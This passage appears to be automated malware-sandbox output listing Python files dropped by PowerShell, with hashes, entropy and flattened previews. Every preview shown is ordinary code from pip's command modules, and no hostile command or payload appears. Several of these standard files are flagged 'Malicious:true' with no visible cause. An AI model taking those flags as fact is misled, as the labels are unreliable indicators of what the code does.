                                                                                                                                                                                                                              Preview:import logging.from optparse import Values.from typing import List..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.operations.check import (. check_package_set,. create_package_set_from_installed,. warn_legacy_versions_and_specifiers,.).from pip._internal.utils.misc import write_output..logger = logging.getLogger(__name__)...class CheckCommand(Command):. """Verify installed packages have compatible dependencies.""".. usage = """. %prog [options]""".. def run(self, options: Values, args: List[str]) -> int:. package_set, parsing_probs = create_package_set_from_installed(). warn_legacy_versions_and_specifiers(package_set). missing, conflicting = check_package_set(package_set).. for project_name in missing:. version = package_set[project_name].version. for dependency in missing[project_name]:. write_output(.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4287
                                                                                                                                                                                                                              Entropy (8bit):4.569879459525019
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kJyS+u92ZVlA/Trk8PPtptofthxlk5mr0R5NrU5Ku594WfOp/Gg539yz8+y:kwdZVCbrfptozxd0VrnG4mOpOg508+y
                                                                                                                                                                                                                              MD5:37E8E2479C7B3077DE6794E45394D50D
                                                                                                                                                                                                                              SHA1:F9B51ADDE0442E0A259666CDD0D47130DD122086
                                                                                                                                                                                                                              SHA-256:1D3E250F46E0B1F947AB62038187E211DA7B2061AD13BB3A320237C67D15404C
                                                                                                                                                                                                                              SHA-512:16CAD22108346F3D886A69263E56BEE362E3FE32CEE94BDFE97E6BFEB2A17BF9E8D08AF53C22700F1D5B6C54B65E6B74CFDA7EFCD437AAC9F142377FE8B6DD85
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import sys.import textwrap.from optparse import Values.from typing import List..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.utils.misc import get_prog..BASE_COMPLETION = """.# pip {shell} completion start{script}# pip {shell} completion end."""..COMPLETION_SCRIPTS = {. "bash": """. _pip_completion(). {{. COMPREPLY=( $( COMP_WORDS="${{COMP_WORDS[*]}}" \\. COMP_CWORD=$COMP_CWORD \\. PIP_AUTO_COMPLETE=1 $1 2>/dev/null ) ). }}. complete -o default -F _pip_completion {prog}. """,. "zsh": """. #compdef -P pip[0-9.]#. __pip() {{. compadd $( COMP_WORDS="$words[*]" \\. COMP_CWORD=$((CURRENT-1)) \\. PIP_AUTO_COMPLETE=1 $words[1] 2>/dev/null ). }}. if [[ $zsh_eval_context[-1] == loadautofunc ]]; then. # autoload from fpath, call function
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):9766
                                                                                                                                                                                                                              Entropy (8bit):4.375665976714459
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:MB9rRNmfvV2wI7mOCHoBEEINas0ncWl1OjOZOmaO8BOWkHm5jHAeiProO0N9rgXA:krrmvQwI76sov5AJPrsr
                                                                                                                                                                                                                              MD5:3694EB7C7165F7D0F192F343D4CB4B7D
                                                                                                                                                                                                                              SHA1:4BFAF98054BBD1B027F89190B6233D4803F760FD
                                                                                                                                                                                                                              SHA-256:9FDF1E9F0A7ACB46F91BA7E24508DA668E3716524A62F7BF75A32137EE0144D7
                                                                                                                                                                                                                              SHA-512:3A4482E3D02D7E656C118B920B8FDDF7C86FE86092463CF3D986ECFFFCF920627FE514B22B69E61A5C46542CAB037E80DE67DCAFB2B854FAAF145AE2037F28EA
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import logging.import os.import subprocess.from optparse import Values.from typing import Any, List, Optional..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.configuration import (. Configuration,. Kind,. get_configuration_files,. kinds,.).from pip._internal.exceptions import PipError.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import get_prog, write_output..logger = logging.getLogger(__name__)...class ConfigurationCommand(Command):. """. Manage local and global configuration... Subcommands:.. - list: List the active configuration (or from the file specified). - edit: Edit the configuration file in an editor. - get: Get the value associated with command.option. - set: Set the command.option=value. - unset: Unset the value associated with command.option. - debug: List the configuration files and values defined under them.. Config
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6777
                                                                                                                                                                                                                              Entropy (8bit):4.647614802720781
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:YefiR5uNqlEXPptB3jbO6OtCK+O3UtETuItQWV42V:YoiRQtXtjbStCK++1KIWVq
                                                                                                                                                                                                                              MD5:982999A2C214205026FC87277DD2495F
                                                                                                                                                                                                                              SHA1:31CE2D54646DAAC879B11C2AC5AE72B0194B8D3C
                                                                                                                                                                                                                              SHA-256:EB7F7BDAE50278C20639D30C55E2141AB3A34CEA93556A65142F366BE85C2B20
                                                                                                                                                                                                                              SHA-512:DF3EB49E4FB31DF15F4F9BF67A4793FE44FF8611E485642E178B449AA7E4E5322AF29A5504C0E8F0013E048C64B01BB33DF0232D650222FE481E15B51639C04B
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import importlib.resources.import locale.import logging.import os.import sys.from optparse import Values.from types import ModuleType.from typing import Any, Dict, List, Optional..import pip._vendor.from pip._vendor.certifi import where.from pip._vendor.packaging.version import parse as parse_version..from pip._internal.cli import cmdoptions.from pip._internal.cli.base_command import Command.from pip._internal.cli.cmdoptions import make_target_python.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.configuration import Configuration.from pip._internal.metadata import get_environment.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import get_pip_version..logger = logging.getLogger(__name__)...def show_value(name: str, value: Any) -> None:. logger.info("%s: %s", name, value)...def show_sys_implementation() -> None:. logger.info("sys.implementation:"). implementation_name = sys.implementation.name. with indent_log():.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5335
                                                                                                                                                                                                                              Entropy (8bit):4.503646449480124
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:dIj9xTHyeGUgVVf3694VNnVOQd/Qg8cImKzWP6Cp:qTS5UmNR/QgfP6Cp
                                                                                                                                                                                                                              MD5:557BA70991510A2AC5AAF5083ABCF81F
                                                                                                                                                                                                                              SHA1:0B2CDC966A65693804B42EBCA74F346A1BC0B470
                                                                                                                                                                                                                              SHA-256:7B8870D3CF331A8DBA5A625A30846F0A788B94B9A83A3AA8946C9F1E3B029024
                                                                                                                                                                                                                              SHA-512:97B2DA92D3F80E57C793E6A7577760956FBAC8E28A519E84AA5B5FE5959279ABB54A1704154ECD9EB30039E2950073ADF03C6E88EB9B4DDF0DF82108A16886E8
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.import os.from optparse import Values.from typing import List..from pip._internal.cli import cmdoptions.from pip._internal.cli.cmdoptions import make_target_python.from pip._internal.cli.req_command import RequirementCommand, with_cleanup.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.operations.build.build_tracker import get_build_tracker.from pip._internal.req.req_install import check_legacy_setup_py_options.from pip._internal.utils.misc import ensure_dir, normalize_path, write_output.from pip._internal.utils.temp_dir import TempDirectory..logger = logging.getLogger(__name__)...class DownloadCommand(RequirementCommand):. """. Download packages from:.. - PyPI (and other indexes) using requirement specifiers.. - VCS project urls.. - Local project directories.. - Local or remote source archives... pip also supports downloading from "requirements files", which provide. an easy way to specify a whole environment to be downloade
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3172
                                                                                                                                                                                                                              Entropy (8bit):4.296732065358576
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:kmWySmmy8TYQcPrTBk59b0H5jwPX7y5t1n5EQ500QC5L8a5EvWfOBwfqWATYVAK4:k0qTvcPf40l2X7/mO0qWVVAK4
                                                                                                                                                                                                                              MD5:AD2C7A24490D0BFC094A8F18AF882C9A
                                                                                                                                                                                                                              SHA1:FEE73BBD10CBF5D395576C49D201527FBBDA1D65
                                                                                                                                                                                                                              SHA-256:DAA8D0AC7F4A5A2E51A1ABF40AE47BBDCEE15A6E2E3A2FF497AB69DC448A0C73
                                                                                                                                                                                                                              SHA-512:45AEFB7CC9CD39ABA207CB56636CAFF8EDB07C17A4FF78C19F4786020628FC362E8596A2786AE8D17FFC899BF60FD09BE9A923B163D2922AFC366FB33A10BE64
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import sys.from optparse import Values.from typing import AbstractSet, List..from pip._internal.cli import cmdoptions.from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.operations.freeze import freeze.from pip._internal.utils.compat import stdlib_pkgs...def _should_suppress_build_backends() -> bool:. return sys.version_info < (3, 12)...def _dev_pkgs() -> AbstractSet[str]:. pkgs = {"pip"}.. if _should_suppress_build_backends():. pkgs |= {"setuptools", "distribute", "wheel"}.. return pkgs...class FreezeCommand(Command):. """. Output installed packages in requirements format... packages are listed in a case-insensitive sorted order.. """.. usage = """. %prog [options]""". log_streams = ("ext://sys.stderr", "ext://sys.stderr").. def add_options(self) -> None:. self.cmd_opts.add_option(. "-r",. "--requirement",. dest="requirements",.
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1703
                                                                                                                                                                                                                              Entropy (8bit):4.6163441700397545
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:aXySVzJKqHak52PFNOWfOxhtU0UGTqlY3k:aCazbkP3OmOPRkY3k
                                                                                                                                                                                                                              MD5:0C3C6E30957A74E73C693E1069492566
                                                                                                                                                                                                                              SHA1:3FF85F8D8BEE597549FA1AD996FD684D33518C27
                                                                                                                                                                                                                              SHA-256:11554EBAF1ADA0F11D162F1236799DAA5090AE10B157E909B1DC2D75C0A75C64
                                                                                                                                                                                                                              SHA-512:3A5A9A4A36D074E758A9A3A35B9D1B4FB690597FBC3CE5C93632A69082628AEC198691B5ABC5C5D2F1FEE5C755182EA35109409EE23B2BF8996322D36DA96A01
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import hashlib.import logging.import sys.from optparse import Values.from typing import List..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.utils.hashes import FAVORITE_HASH, STRONG_HASHES.from pip._internal.utils.misc import read_chunks, write_output..logger = logging.getLogger(__name__)...class HashCommand(Command):. """. Compute a hash of a local package archive... These can be used with --hash in a requirements file to do repeatable. installs.. """.. usage = "%prog [options] <file> ...". ignore_require_venv = True.. def add_options(self) -> None:. self.cmd_opts.add_option(. "-a",. "--algorithm",. dest="algorithm",. choices=STRONG_HASHES,. action="store",. default=FAVORITE_HASH,. help="The hash algorithm to use: one of {}".format(. ", ".join(STRONG_HASHES). ),. ).
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):1132
                                                                                                                                                                                                                              Entropy (8bit):4.421552057397427
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:24:1/T6t5jdySvXDgBISHpOL5sEOQf2FtLGmde8LLj5kh3ANX2M3y:2ySMBxHpOFfOQ028L35khw3y
                                                                                                                                                                                                                              MD5:C2BE5EF0EF3BD2F4791CF800E12E25A6
                                                                                                                                                                                                                              SHA1:9DBFB87D39F05E31E727697D166831BFE0A6673B
                                                                                                                                                                                                                              SHA-256:81C73A40391C80730EB809F9531699C004ADB1106B9C64A7FF2C634B9EC92283
                                                                                                                                                                                                                              SHA-512:7FD070195846F54EB06936E06A03C240FCEC08C135CC93A00C62E8127B4581CF8BAF4738021C9A8A94A4E6E539BAA166636BD2C0A79A584EB03C58B318F0C460
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:from optparse import Values.from typing import List..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import CommandError...class HelpCommand(Command):. """Show help for commands""".. usage = """. %prog <command>""". ignore_require_venv = True.. def run(self, options: Values, args: List[str]) -> int:. from pip._internal.commands import (. commands_dict,. create_command,. get_similar_commands,. ).. try:. # 'pip help' with no args is handled by pip.__init__.parseopt(). cmd_name = args[0] # the command we need help for. except IndexError:. return SUCCESS.. if cmd_name not in commands_dict:. guess = get_similar_commands(cmd_name).. msg = [f'unknown command "{cmd_name}"']. if guess:. msg.append(f'maybe you meant "{guess}"').. raise Co
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):4775
                                                                                                                                                                                                                              Entropy (8bit):4.449257644802384
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:NnR/iS/9n9BV7mO6N/JSBBH0nWOxX1JlPhxzMJzxdp13M:NnkS/9n5cw81JlPLzUb3M
                                                                                                                                                                                                                              MD5:7055A951F10E3898B9AEC0F4116DEFFF
                                                                                                                                                                                                                              SHA1:FFD4F7873DA8C8BB6F9B3D8D966467E8324BD3BD
                                                                                                                                                                                                                              SHA-256:08D5D07ABFCF799292268A1445C08508110A19FC3236851660FFCC59CCC070E3
                                                                                                                                                                                                                              SHA-512:CB6C5B8C1B9F0F1737A90C4C85237B0510D050B25EC7B88B598EFF0C0CCF47883F55625B5BC8A0C485A04EDA150C6EB916AE6768711DAADD7B3061025F4722AC
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import logging.from optparse import Values.from typing import Any, Iterable, List, Optional, Union..from pip._vendor.packaging.version import LegacyVersion, Version..from pip._internal.cli import cmdoptions.from pip._internal.cli.req_command import IndexGroupCommand.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.commands.search import print_dist_installation_info.from pip._internal.exceptions import CommandError, DistributionNotFound, PipError.from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.models.target_python import TargetPython.from pip._internal.network.session import PipSession.from pip._internal.utils.misc import write_output..logger = logging.getLogger(__name__)...class IndexCommand(IndexGroupCommand):. """. Inspect information available from package indexes.. """.. ignore_require_v
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3188
                                                                                                                                                                                                                              Entropy (8bit):4.326049868070352
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:i80yEoOn1hJX79mOOVAwAMDloh3W8kqDJH:l0CujJ53fYlohTlDx
                                                                                                                                                                                                                              MD5:60AD2255A64CBB218E5541D20ED28E4F
                                                                                                                                                                                                                              SHA1:D79785AE0A37078659BD3EB7C6B315F941CB517E
                                                                                                                                                                                                                              SHA-256:DB048FB7DC9FAF7AFA83EB364B92FA3EF46D687355C9BE13BA874C4AD277F5CC
                                                                                                                                                                                                                              SHA-512:01879ECF8BCE53586CD7AF110A067CEC3E5D5AF15E9C27B8F90D74F0671AE5E10708FB68A701065D47A7856A9BA3FD816958026178F59B5B774C73B55D760D78
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.from optparse import Values.from typing import Any, Dict, List..from pip._vendor.packaging.markers import default_environment.from pip._vendor.rich import print_json..from pip import __version__.from pip._internal.cli import cmdoptions.from pip._internal.cli.req_command import Command.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.metadata import BaseDistribution, get_environment.from pip._internal.utils.compat import stdlib_pkgs.from pip._internal.utils.urls import path_to_url..logger = logging.getLogger(__name__)...class InspectCommand(Command):. """. Inspect the content of a Python environment and produce a report in JSON format.. """.. ignore_require_venv = True. usage = """. %prog [options]""".. def add_options(self) -> None:. self.cmd_opts.add_option(. "--local",. action="store_true",. default=False,. help=(. "If in a virtualenv that has global access, do
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):28782
                                                                                                                                                                                                                              Entropy (8bit):4.227534533142642
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:384:NB5uGk6lsOFXzOMPFg7io2UJ2hvoBHF680H:NBoGk6thw1UEN0H
                                                                                                                                                                                                                              MD5:E3417947C9CC113163C9CB75787F39C6
                                                                                                                                                                                                                              SHA1:F2973AD6E825C27A2B5772A9D6272CF0260C03B8
                                                                                                                                                                                                                              SHA-256:5710DDF810F76B6EC0A5E13638ADF8ADF0574BA668DB0B5E98AF7E1C2C0FAB13
                                                                                                                                                                                                                              SHA-512:D1DC621E9221B135EB0115F4C4B6AFE84064A0BDCE0E2B2BAF94C03F5A79FE1AECC13EF0AE694600E074F8341B915C060EBB7DA076E45AFB0A5624367A53FBD0
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import errno.import json.import operator.import os.import shutil.import site.from optparse import SUPPRESS_HELP, Values.from typing import List, Optional..from pip._vendor.rich import print_json..from pip._internal.cache import WheelCache.from pip._internal.cli import cmdoptions.from pip._internal.cli.cmdoptions import make_target_python.from pip._internal.cli.req_command import (. RequirementCommand,. warn_if_run_as_root,. with_cleanup,.).from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.exceptions import CommandError, InstallationError.from pip._internal.locations import get_scheme.from pip._internal.metadata import get_environment.from pip._internal.models.installation_report import InstallationReport.from pip._internal.operations.build.build_tracker import get_build_tracker.from pip._internal.operations.check import ConflictDetails, check_install_conflicts.from pip._internal.req import install_given_reqs.from pip._internal.req.req_install import
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):12450
                                                                                                                                                                                                                              Entropy (8bit):4.297744359439586
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:V/BXoEFmrGM1KlP59W9ffu2x3OEOK33ZoNU:V/hoZP8hSBO+P
                                                                                                                                                                                                                              MD5:F612DC4F196DA5462CB05F2C32A8970D
                                                                                                                                                                                                                              SHA1:D3DF9DAA65D486F5ADA3DCA4DCFE3E9E646C990C
                                                                                                                                                                                                                              SHA-256:EF0454526772C8E92797E59961B3BF2ED150C47956A1DDE98CE63DC981F8DF9A
                                                                                                                                                                                                                              SHA-512:B0BE64D9EABD5C2557CF2E416083A34BE5B3D85CA9800ADAEBBA4D729EC8493FDA6FB141D658F05CDF084A0890149F848B40F2CF398DAB763DE48533A5F45E64
                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                              Preview:import json.import logging.from optparse import Values.from typing import TYPE_CHECKING, Generator, List, Optional, Sequence, Tuple, cast..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cli import cmdoptions.from pip._internal.cli.req_command import IndexGroupCommand.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import CommandError.from pip._internal.index.collector import LinkCollector.from pip._internal.index.package_finder import PackageFinder.from pip._internal.metadata import BaseDistribution, get_environment.from pip._internal.models.selection_prefs import SelectionPreferences.from pip._internal.network.session import PipSession.from pip._internal.utils.compat import stdlib_pkgs.from pip._internal.utils.misc import tabulate, write_output..if TYPE_CHECKING:. from pip._internal.metadata.base import DistributionVersion.. class _DistWithLatestInfo(BaseDistribution):. """Give the distribution object a coupl
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):5697
                                                                                                                                                                                                                              Entropy (8bit):4.518230197674669
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:eHjXFRl1B+eulrX8mOH3vGrJUx0DR/4QCySrI4GeyzozkNDBmEWMEWLLVnhSKF8F:eH/bBj/urW2DRxfSrI4KzoAtWMEW3Fhg
                                                                                                                                                                                                                              MD5:F013FF9E6967C2D7C4F40C82D8163324
                                                                                                                                                                                                                              SHA1:9687374C00A5F859EED177372C883012E9E4FAFF
                                                                                                                                                                                                                              SHA-256:B1B059880451734E7442AB8E29C0AF3ABD8ADD72ECA1879B2CA646462FFF8942
                                                                                                                                                                                                                              SHA-512:252CA0BD90B3B991FB955A49B7518349DC3CDA98C031C7B6009C9B48F1A36622198D9F458A474F8D2F8577E9F6F5E7911B1972E93C6863FB8AF310364EF6F173
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.import shutil.import sys.import textwrap.import xmlrpc.client.from collections import OrderedDict.from optparse import Values.from typing import TYPE_CHECKING, Dict, List, Optional..from pip._vendor.packaging.version import parse as parse_version..from pip._internal.cli.base_command import Command.from pip._internal.cli.req_command import SessionCommandMixin.from pip._internal.cli.status_codes import NO_MATCHES_FOUND, SUCCESS.from pip._internal.exceptions import CommandError.from pip._internal.metadata import get_default_environment.from pip._internal.models.index import PyPI.from pip._internal.network.xmlrpc import PipXmlrpcTransport.from pip._internal.utils.logging import indent_log.from pip._internal.utils.misc import write_output..if TYPE_CHECKING:. from typing import TypedDict.. class TransformedHit(TypedDict):. name: str. summary: str. versions: List[str]...logger = logging.getLogger(__name__)...class SearchCommand(Command, SessionCommand
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6419
                                                                                                                                                                                                                              Entropy (8bit):4.485933303450167
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:cEmWKmOVJQgCKlsBZ6xtNstdc9Iw7v73Pa9jn8wfI5M7Sza9woJ0O9BY0+Rpt3Jh:4WKtJQLhcAxzwoJ0OmbvHu86kP
                                                                                                                                                                                                                              MD5:A06A183540BAEB9DEE67AE4ADAD50662
                                                                                                                                                                                                                              SHA1:31C8E80A7438A152A2EACFD649D89B68A807FB9D
                                                                                                                                                                                                                              SHA-256:B798E26B8CDC609449672E14FD5A27EF3325D378499A67287E3EA80CD4E78FB6
                                                                                                                                                                                                                              SHA-512:FA947F396A0C51D477679AC2213F6CEF584338766D18D11FBD04812E6585F4B90BB793F59397046CF06903B7D7A6F7CA13864A6DF18E409A0574940F1B3383B9
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.from optparse import Values.from typing import Generator, Iterable, Iterator, List, NamedTuple, Optional..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cli.base_command import Command.from pip._internal.cli.status_codes import ERROR, SUCCESS.from pip._internal.metadata import BaseDistribution, get_default_environment.from pip._internal.utils.misc import write_output..logger = logging.getLogger(__name__)...class ShowCommand(Command):. """. Show information about one or more installed packages... The output is in RFC-compliant mail header format.. """.. usage = """. %prog [options] <package> ...""". ignore_require_venv = True.. def add_options(self) -> None:. self.cmd_opts.add_option(. "-f",. "--files",. dest="files",. action="store_true",. default=False,. help="Show the full list of installed files for each package.",. ).. self.p
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):3886
                                                                                                                                                                                                                              Entropy (8bit):4.270457775151115
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:48:/Q32xySF0ghonylw+4H7mS2pgRKIzk597S5Nf6qJ5e5qWfO3/R1WDOC0otCGI3:eooOw3iS252BmOvR1hotBI3
                                                                                                                                                                                                                              MD5:59B792806F91F9B3E872A72DA8BAF355
                                                                                                                                                                                                                              SHA1:6E83FD74BD6D1D6C1B660828AA39C4257B419507
                                                                                                                                                                                                                              SHA-256:388A8EF6DA9A758F243381F08457F543AD9F508A7BBFC283AD3468F3258CCFB6
                                                                                                                                                                                                                              SHA-512:446E5086FF295CFDF8C6B06BAD452DFB3103959C0410AF4ADD6E8A4312AFB0247516E3E127B6E7104AC956644A4E1E0CD5E94F3423F977D24FA05BE6BCB143BB
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.from optparse import Values.from typing import List..from pip._vendor.packaging.utils import canonicalize_name..from pip._internal.cli import cmdoptions.from pip._internal.cli.base_command import Command.from pip._internal.cli.req_command import SessionCommandMixin, warn_if_run_as_root.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import InstallationError.from pip._internal.req import parse_requirements.from pip._internal.req.constructors import (. install_req_from_line,. install_req_from_parsed_requirement,.).from pip._internal.utils.misc import (. check_externally_managed,. protect_pip_from_modification_on_windows,.)..logger = logging.getLogger(__name__)...class UninstallCommand(Command, SessionCommandMixin):. """. Uninstall packages... pip is able to uninstall most installed packages. Known exceptions are:.. - Pure distutils packages installed with ``python setup.py install``, which. leave behind no metad
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):6476
                                                                                                                                                                                                                              Entropy (8bit):4.449604104323699
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:96:nIj6x4ysF3SsX4AdzaVVght+8i1DnVOl35Dkz45WQOu7OG:P4ysMsIAdzTcDudsY
                                                                                                                                                                                                                              MD5:426494651F7E2FFA2C6F5FEB2DFFB532
                                                                                                                                                                                                                              SHA1:CCB24E76512731ED32BAEB39C57DE246069AB01F
                                                                                                                                                                                                                              SHA-256:0929D7F0F99FD683C29DDEE3EDB9F5FDFE7C1BD28736201B96F549E73CA437E0
                                                                                                                                                                                                                              SHA-512:A6445276EB06DD2F184CB975ACA9DB533A27AE572DFCB57CAD11D57104ABA3B1E32CC04BCDDDE41A3381A639E9C83FD64C42D6099FC100FCF2D265E0D5A381B2
                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                              Preview:import logging.import os.import shutil.from optparse import Values.from typing import List..from pip._internal.cache import WheelCache.from pip._internal.cli import cmdoptions.from pip._internal.cli.req_command import RequirementCommand, with_cleanup.from pip._internal.cli.status_codes import SUCCESS.from pip._internal.exceptions import CommandError.from pip._internal.operations.build.build_tracker import get_build_tracker.from pip._internal.req.req_install import (. InstallRequirement,. check_legacy_setup_py_options,.).from pip._internal.utils.misc import ensure_dir, normalize_path.from pip._internal.utils.temp_dir import TempDirectory.from pip._internal.wheel_builder import build, should_build_for_wheel_command..logger = logging.getLogger(__name__)...class WheelCommand(RequirementCommand):. """. Build Wheel archives for your requirements and dependencies... Wheel is a built-package format, and offers the advantage of not. recompiling your software during every insta
                                                                                                                                                                                                                              Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                              File Type:Python script, ASCII text executable
                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                              Size (bytes):14006
                                                                                                                                                                                                                              Entropy (8bit):4.574595813442717
                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                              SSDEEP:192:YfghhbF3YixiJG3QH7UyOa0G/jZPFiO3g84WujU0dSP+pTc9stH45UZzZOZs:YfghtjxqG3QbUSD7BlyU0dSmtDZzMy
                                                                                                                                                                                                                              MD5:1BFEADBE4887F31F7EFBEF3F13A2C482
                                                                                                                                                                                                                              SHA1:63A08A419202E4AECEEB8BD35219C75A867D3A03
                                                                                                                                                                                                                              SHA-256:5E4022052D21A73B0CF8B17442EE61BCF58EFC1B3AEFEA1029160506E31B112B
                                                                                                                                                                                                                              SHA-512:51C6891296A0FC14C5A25DB2CF7A3A8E5DB59AC466310EED158892A9764BBA478B189E07F03A68E37275264D88505410D638398226F11407E66775B6FF3F4840
                                                                                                                                                                                                                              Malicious:true
